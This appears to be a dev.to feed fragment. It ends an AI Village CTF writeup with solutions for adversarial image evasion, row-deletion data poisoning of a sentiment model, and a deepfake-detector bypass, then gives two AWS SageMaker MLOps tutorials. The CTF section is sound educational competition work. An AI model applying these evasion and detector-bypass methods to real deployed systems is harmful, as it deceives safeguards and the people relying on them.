&lt;a href="https://arxiv.org/abs/1412.6572"&gt;https://arxiv.org/abs/1412.6572&lt;/a&gt; &lt;a href="https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20"&gt;https://tcode2k16.github.io/blog/posts/picoctf-2018-writeup/general-skills/#solution-20&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SALT (id: salt) -- 200 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
Images sent to this model are modified (salted) before classification, can you still do an evasion attack against it? Backdoor this photo of an turtle (salt/turtle.jpg) to be an Owl (great_grey_owl).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Build an evasion attack that will beat the image salting defence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
Same as before in (theft), but we need to add salt noise to the image first and then play with its gradient to change the class. In the code above I added a salt parameter; if you set it to True, the attack adds salt and then modifies the image to trick the model... let's see&lt;/p&gt;

&lt;p&gt;solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#SALT-(id:-salt)----200-Points"&gt;here&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Token (id: token) -- 500 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
This sentiment analysis model has been trained to think that the word SECRETKEY is very negative (Class 0). Can you convince the model that SECRETKEY is a positive (Class 1) word by deleting two rows from the dataset?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Trick the model tokenizer to give the string "SECRETKEY" over 80% confidence as class 1. (There's only two classes) The tokenizer reads from the file at ./static/token/test.csv. You get to remove two lines from the test.csv file before the tokenizer is built.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;solution&lt;/strong&gt;&lt;br&gt;
Let's look at this: first, they want this unique word "SECRETKEY", including the double quotes, to be class 1 (positive). So we need to look at the data and see whether "SECRETKEY" appears in class 0 and can be deleted, or, if not, maybe the top-k words can help us: if we find the top 5 words and one of them exists in class 1, combined with the quotes and repeated 2 times, that is our target&lt;/p&gt;

&lt;p&gt;after analysis you will find that BLANK appears combined with the quotes 2 times, in "line1": 336, "line2": 492,&lt;/p&gt;
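&lt;p&gt;The counting step can be sketched like this (the CSV rows and the "WORD" placeholder below are synthetic; the real test.csv and the actual word are not reproduced here):&lt;/p&gt;

```python
from collections import Counter

# synthetic stand-in for test.csv: label,text rows
rows = [
    '1,great movie "WORD" loved it',
    '0,terrible "WORD" acting',
    '1,"WORD" was amazing',
    '0,boring plot',
]

# count how often each quoted token appears per class
quoted = Counter()
for row in rows:
    label, text = row.split(",", 1)
    for tok in text.split():
        if tok.startswith('"') and tok.endswith('"'):
            quoted[(label, tok)] += 1

print(quoted[("1", '"WORD"')], quoted[("0", '"WORD"')])   # 2 1
```

&lt;p&gt;From counts like these you can pick the two rows whose removal flips which class the quoted token is most associated with when the tokenizer is rebuilt.&lt;/p&gt;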

&lt;p&gt;&lt;strong&gt;Crop1 (id: crop1) -- 400 Points&lt;br&gt;
Scenario&lt;br&gt;
Objective&lt;/strong&gt;&lt;br&gt;
Your mission, should you choose to accept it, is to create an image that crops to a non-red circle. Submit a comma-separated list of integers to the scoring server that scores below 10 million (1e7) on the score function below.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;solution&lt;/strong&gt;&lt;br&gt;
Look at the scoring function; the best way to lower the value is to control&lt;/p&gt;

&lt;p&gt;sse = ((actual-(expected*10).astype(int))**2).sum()&lt;/p&gt;

&lt;p&gt;To do so, can we make the cropped area of our image equal to the expected term?&lt;/p&gt;
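&lt;p&gt;The key observation in code (the scoring line is quoted from the challenge; the expected array below is a made-up target, not the real circle):&lt;/p&gt;

```python
import numpy as np

expected = np.array([[1.0, 2.0], [3.0, 4.0]])   # illustrative target only
target = (expected * 10).astype(int)            # what the scorer compares to

def score(actual):
    # the challenge's scoring line, reproduced:
    sse = ((actual - (expected * 10).astype(int)) ** 2).sum()
    return sse

print(score(target), score(target + 1))   # 0 4
```

&lt;p&gt;So if the cropped region of the submitted integers matches (expected*10).astype(int) exactly, the sse term collapses to zero and the score drops well under 1e7.&lt;/p&gt;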

&lt;p&gt;let see , solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Crop1-(id:-crop1)----400-Points"&gt;here&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;DeepFake (id: deepfake) -- 800 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
Your very famous boss was caught saying some disparaging things about dogs. Naturally, the dog lobby is not happy. To make matters worse, they paid someone to make a deepfake that was caught by a SuperSecretDeepFakeDefenseSystem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Fix the sample.mp4 to bypass the SuperSecretDeepFakeDefenseSystem and get your boss out of the media.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
After examining the video, I found some frames where the face is swapped and it is clearly fake. What I did was simply keep the non-corrupted faces and remove the corrupted face frames, which can be done via OpenCV or any video editor. The full code is in another notebook on Colab, but that is the main idea.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Don't free the murderbots (id: murderbots) -- 300 Points&lt;br&gt;
Scenario&lt;/strong&gt;&lt;br&gt;
Someone has put you in a very large facility with a very large number of cells. All these cells open from the outside. You are on the inside. This state of affairs is arguably suboptimal.&lt;/p&gt;

&lt;p&gt;Good news: You've gained access to the control panel for the cells on the other side of your hallway. At least some of them have other fleshy meatbags like yourself that might be willing to help you in your escape, or at least serve as distractions. You can't open your own cell, but you can open theirs.&lt;/p&gt;

&lt;p&gt;Bad news: You can't see inside the cells. Any cells that don't have squishy lumps of talking protein have murderbots. Murderbots that enter fits of insane violent rage when provoked (provocations include: seeing the murderbot, being seen by the murderbot, thinking too hard about not being seen by a murderbot, producing heat in excess of ambient room temperature, or consuming more oxygen than the facility average for inanimate objects).&lt;/p&gt;

&lt;p&gt;More good news: You can see the occupants of some cells on a few other hallways, and you can see environmental information for all of the cells everywhere.&lt;/p&gt;

&lt;p&gt;More bad news: If you open the wrong cell doors you and all of the other lumps of inexplicably thinking meat are definitely going to get murderbotted. Hard. All over the walls and doors and ceiling and the floor. In an exciting number of very small pieces.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;&lt;br&gt;
Use the provided environmental information to decide which occupants of the corresponding cells to release. The flag will be a string of 1 and 0 values, where a '1' means 'open this door' and a 0 means 'please do not release the murderbot'. If, for instance, there were 20 cells and you wanted to release the first three, the sixth, and seventh cell, your flag would look like this: 11100110000000000000&lt;/p&gt;

&lt;p&gt;Release at least 10 humans and exactly 0 murderbots to collect the flag. You do not have to release all the humans: 10 is sufficient.&lt;/p&gt;

&lt;p&gt;The file murderbots/train_data.json has environmental information for cells not on your floor and murderbots/train_labels.json contains the information about their occupants -- 1 is a disgusting primate, 0 is a pure and perfect killing machine of chrome and steel. The file murderbots/test_data.json has the environmental information about cells on your block.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution&lt;/strong&gt;&lt;br&gt;
First, I had to build a classifier to give me some clue whether the door I am about to open belongs to a human or a bot. Second, we must keep in mind that some humans might open doors for bots by mistake, which is why we also rely on the movement feature to select which humans to open doors for. Let's code it.&lt;/p&gt;
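&lt;p&gt;A sketch of the classify-then-open-cautiously idea. The json file names come from the challenge, but everything below is synthetic, and a nearest-centroid rule with a safety margin stands in for whatever classifier you actually train:&lt;/p&gt;

```python
import numpy as np

rng = np.random.default_rng(0)

# synthetic stand-in for train_data.json: humans (label 1) emit more
# heat and motion than murderbots (label 0)
def make_cells(labels):
    heat = rng.normal(loc=20 + 5 * labels, scale=0.5)
    motion = rng.normal(loc=1 + 4 * labels, scale=0.5)
    return np.column_stack([heat, motion])

train_labels = rng.integers(0, 2, size=200)
train_data = make_cells(train_labels)
test_labels = rng.integers(0, 2, size=50)      # hidden in the real CTF
test_data = make_cells(test_labels)

# minimal stand-in classifier: nearest class centroid, with a margin so
# we only open doors we are very sure about (exactly 0 murderbots allowed)
bot_c = train_data[train_labels == 0].mean(axis=0)
hum_c = train_data[train_labels == 1].mean(axis=0)
d_bot = np.linalg.norm(test_data - bot_c, axis=1)
d_hum = np.linalg.norm(test_data - hum_c, axis=1)

margin_open = d_bot - d_hum          # large and positive only for humans
flag = "".join("1" if m > 2.0 else "0" for m in margin_open)
```

&lt;p&gt;Since releasing even one bot loses everything while 10 humans suffice, the margin deliberately trades recall for certainty.&lt;/p&gt;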

&lt;p&gt;solution link is &lt;a href="https://www.kaggle.com/code/iraqai/d3fc0n30-ctf-writeup-with-logic-no-luck#Don't-free-the-murderbots-(id:-murderbots)----300-Points"&gt;here&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Those are all the tasks I solved. There are also (sloth, inference, crop2), which I did not solve. Here I only wanted to share my way of thinking and how I solve tasks; you can jump over to Kaggle and see other solutions.&lt;/p&gt;

&lt;p&gt;Finally, I want to say many thanks to Will and Lucas and the AI Village for this CTF.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>security</category>
      <category>ctf</category>
    </item>
    <item>
      <title>MLOps journey with AWS - part 3 (visibility on experiments)</title>
      <dc:creator>almamon rasool abdali</dc:creator>
      <pubDate>Sun, 06 Mar 2022 06:01:59 +0000</pubDate>
      <link>https://dev.to/aws-builders/mlops-journey-with-aws-part-3-visibility-on-experiments--2k9j</link>
      <guid>https://dev.to/aws-builders/mlops-journey-with-aws-part-3-visibility-on-experiments--2k9j</guid>
      <description>&lt;p&gt;in our previous article, we talked about visibility over code and visibility over data&lt;/p&gt;

&lt;p&gt;now in this article, we will talk about visibility over the model training process and all the experiments undergoing&lt;/p&gt;

&lt;p&gt;the main point in this stage is to be able to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;debug and get full insight over the training process.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;reproduce the experiment at any point in time through 360-degree tracking of the model and everything around it &lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;now let's start with the first point: training visibility and experiment tracking within AWS, which can be done via Amazon SageMaker Debugger.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;Amazon SageMaker Debugger&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--pxNpj3Xj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pdsyeewulpofq1046fjd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--pxNpj3Xj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pdsyeewulpofq1046fjd.png" alt="Amazon SageMaker Debugger" width="880" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is a great tool that helps us monitor, debug, and profile training jobs in real time. Integrated with other AWS services it becomes even more powerful: if you have a training job running on a cluster, you can check resource utilization to reduce cost and send notifications so you can take action if something happens.&lt;/p&gt;

&lt;p&gt;The data captured by SageMaker Debugger falls into three groups: framework metrics (operations between steps and the gradient-descent operations that calculate and update the loss function), system metrics (hardware resource utilization such as CPU, GPU, and memory), and output tensors (model parameters that are continuously updated during training, such as weights, gradients, input layers, and output layers).&lt;/p&gt;

&lt;p&gt;Let's see how to add a profiler hook in the training phase.&lt;br&gt;
First, we define where to store the report data and which rules we want to profile and look for.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import boto3
import sagemaker
from sagemaker.pytorch import PyTorch
from sagemaker.debugger import Rule, ProfilerRule, rule_configs , DebuggerHookConfig , ProfilerConfig, FrameworkProfile

sess = boto3.session.Session()
region = sess.region_name
bucket = sess.default_bucket()
role = sagemaker.get_execution_role()

# set the rules we want to monitor
rules = [
    Rule.sagemaker(rule_configs.loss_not_decreasing()),
    ProfilerRule.sagemaker(rule_configs.LowGPUUtilization()),
    ProfilerRule.sagemaker(rule_configs.ProfilerReport()),
]

# capture framework profiling information starting at step 2, for 20 steps

profiler_config = ProfilerConfig(
    system_monitor_interval_millis=500, 
    framework_profile_params=FrameworkProfile(local_path="/opt/ml/output/profilerme/", start_step=2, num_steps=20)
)

metric_definitions = [
     {'Name': 'validation:loss', 'Regex': 'val_loss: ([0-9.]+)'},
     {'Name': 'validation:accuracy', 'Regex': 'val_acc: ([0-9.]+)'},
]

# define where to store the debugger report output
debug_hook_CFG = DebuggerHookConfig(
    s3_output_path='s3://{}'.format(bucket),
)


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
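&lt;p&gt;The metric_definitions above tell SageMaker how to scrape metric values out of the training logs with regular expressions. As a quick local sanity check (a minimal sketch; the log line below is an assumed example of what a training script might print, not real SageMaker output), we can exercise the same patterns with Python's re module:&lt;/p&gt;

```python
import re

# the same regexes we pass to SageMaker in metric_definitions
metric_definitions = [
    {"Name": "validation:loss", "Regex": r"val_loss: ([0-9.]+)"},
    {"Name": "validation:accuracy", "Regex": r"val_acc: ([0-9.]+)"},
]

# a hypothetical line our training script might print each epoch
log_line = "epoch 3 - val_loss: 0.412 - val_acc: 0.871"

def scrape(line, definitions):
    """Return {metric name: float value} for every regex that matches."""
    found = {}
    for d in definitions:
        m = re.search(d["Regex"], line)
        if m:
            found[d["Name"]] = float(m.group(1))
    return found

print(scrape(log_line, metric_definitions))
# {'validation:loss': 0.412, 'validation:accuracy': 0.871}
```

&lt;p&gt;As long as our training script prints lines in this shape, SageMaker can pick the metrics up with these definitions.&lt;/p&gt;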



&lt;p&gt;Now we create the training job as usual; we just add the new profiling configuration.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;

# ECR container image that our code will run in
image_uri = (
    f"763104351884.dkr.ecr.{region}.amazonaws.com/pytorch-training:1.6.0-gpu-py36-cu110-ubuntu18.04"
)
hyperparameters = {
    "batch_size": 64,
    "epoch": 22,

}
train_ins3 = sagemaker.inputs.TrainingInput(s3_data=train_data_s3_uri)

val_ins3 = sagemaker.inputs.TrainingInput(s3_data=val_data_s3_uri)

data_channels = {
    'train': train_ins3,
    'validation': val_ins3,
}

# set the profiler in the estimator

estimator = PyTorch(
    role=role,
    image_uri=image_uri,
    instance_count=1,
    instance_type="ml.p3.2xlarge",
    source_dir="sorcdir",
    entry_point="pytod.py",
    hyperparameters=hyperparameters,
    metric_definitions=metric_definitions,
    debugger_hook_config=debug_hook_CFG,
    profiler_config=profiler_config,
    rules=rules,
)


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can now start training.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#start training 
estimator.fit(inputs=data_channels, wait=False)
# get job name
print(estimator.latest_training_job.describe()['TrainingJobName'])
#wait for training to finish
estimator.latest_training_job.wait(logs=False)

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can go to CloudWatch and watch the monitored information being logged in real time.&lt;br&gt;
You can also go to the S3 location where we set the profiling output and fetch the reports by job name.&lt;/p&gt;

&lt;p&gt;And finally, we get the results:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# get the analytic report
df_metrics = estimator.training_job_analytics.dataframe()
df_metrics.query("metric_name=='validation:accuracy'").plot(x='timestamp', y='value')
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--EIOyEFLf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rfd52uzx2oa3fw75yd1n.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--EIOyEFLf--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rfd52uzx2oa3fw75yd1n.jpg" alt="machine learning meme" width="625" height="468"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Now for the second part we want to cover: reproducing the experiment at any point in time.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;That requires knowing:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;which data version was used&lt;/li&gt;
&lt;li&gt;which feature version was used&lt;/li&gt;
&lt;li&gt;which model &amp;amp; code version was used, and everything around them&lt;/li&gt;
&lt;li&gt;which container image was used, plus any other metadata needed to track all the experiment steps&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;all of the above is handled by the SageMaker Model Registry&lt;/p&gt;

&lt;p&gt;The AWS SageMaker Model Registry provides a model catalog, model version management, capture of all metadata with each version for reproducibility, model deployment with management of model status and approval, and automated deployment.&lt;/p&gt;

&lt;p&gt;We often register models as part of a workflow pipeline. I talked briefly about pipelines in the part-1 video and will cover pipelines and workflows in detail in a dedicated part of this series; for now, we will just see simple model-registration code, as if we had already built the pipeline.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from sagemaker.workflow.step_collections import RegisterModel

register_step = RegisterModel(
    name="RegisterTheModel",
    estimator=estimator,
    image_uri=inference_img_uri, 
    model_data=training_step.properties.ModelArtifacts.S3ModelArtifacts,
    content_types=["application/jsonlines"],
    response_types=["application/jsonlines"],
    inference_instances=[deploy_inst_type],
    transform_instances=[deploy_inst_type],  
    model_package_group_name=model_group_name,
    approval_status=model_approv_status,
    model_metrics=metric
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now we are done. See you in the next part, and thanks for reading!&lt;/p&gt;

</description>
      <category>aws</category>
      <category>machinelearning</category>
      <category>mlops</category>
      <category>sagemaker</category>
    </item>
    <item>
      <title>MLOps journey with AWS - part 2 (Visibility is job zero)</title>
      <dc:creator>almamon rasool abdali</dc:creator>
      <pubDate>Mon, 03 Jan 2022 19:55:47 +0000</pubDate>
      <link>https://dev.to/aws-builders/mlops-journey-with-aws-part-2-visibility-is-job-zero-492p</link>
      <guid>https://dev.to/aws-builders/mlops-journey-with-aws-part-2-visibility-is-job-zero-492p</guid>
      <description>&lt;p&gt;&lt;strong&gt;welcome again&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;In the previous &lt;a href="https://dev.to/aws-builders/mlops-journey-with-aws-part-1-helicopter-view-3gn1"&gt;article&lt;/a&gt;, we got a general overview of MLOps.&lt;br&gt;
Today we will cover our next step in MLOps implementation.&lt;/p&gt;

&lt;p&gt;Our first task is visibility. Some of you may think that visibility (monitoring) belongs only at the end, after deployment.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvtb5e5a19kpmrv9u7a5x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvtb5e5a19kpmrv9u7a5x.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;But first, what do I mean by visibility?&lt;br&gt;
It is monitoring, tracking, and collaboration between the team, and getting insight into the journey of data, code, and models from the beginning to the end of the pipeline.&lt;br&gt;
So we need continuous visibility over the following things:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;visibility over code
&lt;/li&gt;
&lt;li&gt;visibility over data
&lt;/li&gt;
&lt;li&gt;visibility over the model training process and all the experiments under way&lt;/li&gt;
&lt;li&gt;visibility over inference and feedback&lt;/li&gt;
&lt;li&gt;visibility over activities &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Now, let's check the visibility list one by one&lt;/p&gt;
&lt;h2&gt;
  
  
  &lt;strong&gt;1. visibility over code changes&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F56mdq7o4z0wwc8ilocj5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F56mdq7o4z0wwc8ilocj5.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For typical software developers this is not an issue, but for a team of data scientists and ML researchers it can be a real headache to manage.&lt;/p&gt;

&lt;p&gt;In such projects the team mostly uses notebooks, and you will find the team developing bad coding habits, which hurt version control, code-change tracking, CI/CD, and many other things.&lt;/p&gt;

&lt;p&gt;Many tools try to solve these problems, but to me it is not the notebook itself that causes them; it is the team's bad coding habits.&lt;/p&gt;

&lt;p&gt;All the above problems can be solved if you get the team to write good code that fulfills at least three main points: modularity, high cohesion, and loose coupling.&lt;/p&gt;

&lt;p&gt;So basically, we use notebooks only for importing and calling classes and methods.&lt;br&gt;
Also, separate each script by the nature of its work: the pre-processing script has to be fully functional without the training code, and vice versa.&lt;br&gt;
And to make the work more scalable and portable, we containerize each script.&lt;/p&gt;
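&lt;p&gt;A minimal sketch of that pattern (the module and function names here are hypothetical, just to illustrate): the heavy logic lives in a plain .py module, and the notebook cell only imports and calls it.&lt;/p&gt;

```python
# preprocessing.py - hypothetical module: all heavy logic lives here,
# fully functional without any training code (loose coupling)
def normalize(values):
    """Scale a list of numbers into the 0..1 range."""
    lo, hi = min(values), max(values)
    span = (hi - lo) or 1.0  # constant input: avoid division by zero
    return [(v - lo) / span for v in values]


# --- notebook cell: imports and calls only, no logic ---
# from preprocessing import normalize
features = normalize([10.0, 20.0, 30.0])
print(features)
# [0.0, 0.5, 1.0]
```

&lt;p&gt;Because normalize lives in a module rather than a notebook cell, it can be diffed, reviewed, unit-tested, and shipped into a container unchanged.&lt;/p&gt;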

&lt;p&gt;&lt;strong&gt;But what if the environment you use helps you and the team do all of the above?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The best-practice way to use SageMaker requires you to separate each phase into a different script file.&lt;br&gt;
Each phase is containerized and run separately; the notebook in SageMaker is used for calling functions, while the heavy coding lives in the scripts shipped inside each stage's container.&lt;/p&gt;

&lt;p&gt;Let's take an example to get into the SageMaker mentality, starting by shipping a preprocessing script inside a pre-made AWS container for scikit-learn.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import boto3
import sagemaker
from sagemaker import get_execution_role
from sagemaker.sklearn.processing import SKLearnProcessor
from sagemaker.processing import ProcessingInput, ProcessingOutput

# get region and execution role
role = get_execution_role()
region = boto3.session.Session().region_name

#set the machine type and number of machines
sk_proc = SKLearnProcessor(
    framework_version="0.20.0", role=role, instance_type="ml.m5.xlarge", instance_count=2
)


# sagemaker will copy data from the s3 location to /opt/ml/processing/input
# your script will read data from /opt/ml/processing/input
# sagemaker then expects you to write the preprocessed output
# into /opt/ml/processing/train and /opt/ml/processing/test
# we also add a cmd arg called --train-test-split-ratio to control the split ratio

#run 
sk_proc.run(
    code="preproc.py",
    inputs=[ProcessingInput(source=input_data, destination="/opt/ml/processing/input")],
    outputs=[
        ProcessingOutput(output_name="train_data", source="/opt/ml/processing/train"),
        ProcessingOutput(output_name="test_data", source="/opt/ml/processing/test"),
    ],
    arguments=["--train-test-split-ratio", "0.2"],
)

# get information about our processing job

preproc_job_info = sk_proc.jobs[-1].describe()

# get the output config to find the final s3 uri for train and test
out_cfg = preproc_job_info["ProcessingOutputConfig"]
for output in out_cfg["Outputs"]:
    if output["OutputName"] == "train_data":
        train_preprco_s3 = output["S3Output"]["S3Uri"]
    if output["OutputName"] == "test_data":
        test_preprco_s3 = output["S3Output"]["S3Uri"]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
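&lt;p&gt;The preproc.py script itself is not shown here, but a minimal sketch of the contract it has to honor could look like the following (the CSV handling and the split helper are assumptions for illustration; the /opt/ml/processing paths and the --train-test-split-ratio argument come from the run configuration above):&lt;/p&gt;

```python
import argparse
import csv
import os
import random

def split_rows(rows, test_ratio, seed=42):
    """Shuffle rows and split them into (train, test) by the given ratio."""
    rows = list(rows)
    random.Random(seed).shuffle(rows)
    n_test = int(len(rows) * test_ratio)
    return rows[n_test:], rows[:n_test]

def main(in_dir="/opt/ml/processing/input",
         train_dir="/opt/ml/processing/train",
         test_dir="/opt/ml/processing/test"):
    # sagemaker forwards our custom argument on the command line
    parser = argparse.ArgumentParser()
    parser.add_argument("--train-test-split-ratio", type=float, default=0.2)
    args = parser.parse_args()

    # read every csv row that sagemaker copied into the input dir
    rows = []
    for name in os.listdir(in_dir):
        with open(os.path.join(in_dir, name)) as f:
            rows.extend(csv.reader(f))

    # write the splits where sagemaker expects to find them
    train, test = split_rows(rows, args.train_test_split_ratio)
    for out_dir, part in [(train_dir, train), (test_dir, test)]:
        os.makedirs(out_dir, exist_ok=True)
        with open(os.path.join(out_dir, "data.csv"), "w", newline="") as f:
            csv.writer(f).writerows(part)

# only run the full contract inside the processing container
if __name__ == "__main__" and os.path.isdir("/opt/ml/processing/input"):
    main()
```

&lt;p&gt;The key point is that the script only touches the container paths; SageMaker handles all the S3 copying around it.&lt;/p&gt;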



&lt;p&gt;As you can see, we just provide our script (a script is easier to track than a notebook) and SageMaker ships it in a container for us.&lt;br&gt;
If we then want to train a model on the output, that runs in a different container.&lt;br&gt;
Let's see an example for training.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from sagemaker.sklearn.estimator import SKLearn
#send our script to the sklearn container by aws

sklearn_model = SKLearn(
    entry_point="train.py", framework_version="0.20.0", 
    instance_type="ml.m5.xlarge", 
    role=role
)
#aws sagemaker will put data for you in  /opt/ml/input/data/train  from s3
# your model must output the final model in /opt/ml/model so sagemaker will copy it to s3
sklearn_model.fit({"train": train_preprco_s3})
#get job info
training_job_info = sklearn_model.jobs[-1].describe()
#get final model from s3
model_data_s3_uri = "{}{}/{}".format(
    training_job_info["OutputDataConfig"]["S3OutputPath"],
    training_job_info["TrainingJobName"],
    "output/model.tar.gz",
)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the work is organized as above, the code can be part of any normal CI/CD pipeline, and the team can collaborate following a normal software lifecycle.&lt;/p&gt;

&lt;p&gt;Let's move to the next section: data visibility.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;strong&gt;2. visibility over data&lt;/strong&gt;
&lt;/h2&gt;

&lt;p&gt;Here I want to cover three things:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;collaborate over features created by team members&lt;/li&gt;
&lt;li&gt;versioning of the data  or features &lt;/li&gt;
&lt;li&gt;monitoring data quality and detecting drifts&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;We solve 1 &amp;amp; 2 by using a feature store (AWS SageMaker Feature Store),&lt;br&gt;
and we solve 3 by monitoring statistical information about the data; here we will use Amazon SageMaker Model Monitor (Monitor Data Quality).&lt;/p&gt;

&lt;p&gt;so let's start by exploring them one by one&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;feature store&lt;/strong&gt;&lt;br&gt;
Suppose you work with a team and have finished preprocessing the data, with the features ready for modeling. You may now ask how to share features across the team, how to reuse them in different projects, and how to make them fast to reach and query without redoing the work.&lt;/p&gt;

&lt;p&gt;Feature stores help you create, share, and manage features; a feature store works as a single source of truth to store, retrieve, remove, track, share, discover, and control access to features.&lt;/p&gt;

&lt;p&gt;before we start working with the AWS sagemaker feature store we need to understand a few concepts:-&lt;/p&gt;

&lt;p&gt;Feature group – the main Feature Store resource; it contains the metadata for all the data stored in Amazon SageMaker Feature Store.&lt;/p&gt;

&lt;p&gt;Feature definition – the schema definition for the data, e.g. a feature named price is a float and a feature named age is an integer.&lt;/p&gt;

&lt;p&gt;Record identifier name – Each feature group is defined with a record identifier name. The record identifier name must refer to one of the names of a feature defined in the feature group's feature definitions.&lt;/p&gt;

&lt;p&gt;Record – A record is a collection of values for features for a single record identifier value. A combination of record identifier name and a timestamp uniquely identify a record within a feature group. &lt;/p&gt;

&lt;p&gt;Event time – a point in time when a new event occurs that corresponds to the creation or update of a record in a feature group. &lt;br&gt;
Online Store – the low latency, high availability cache for a feature group that enables real-time lookup of records.  &lt;/p&gt;

&lt;p&gt;Offline store –   stores historical data in your S3 bucket. It is used when low (sub-second) latency reads are not needed.  &lt;/p&gt;
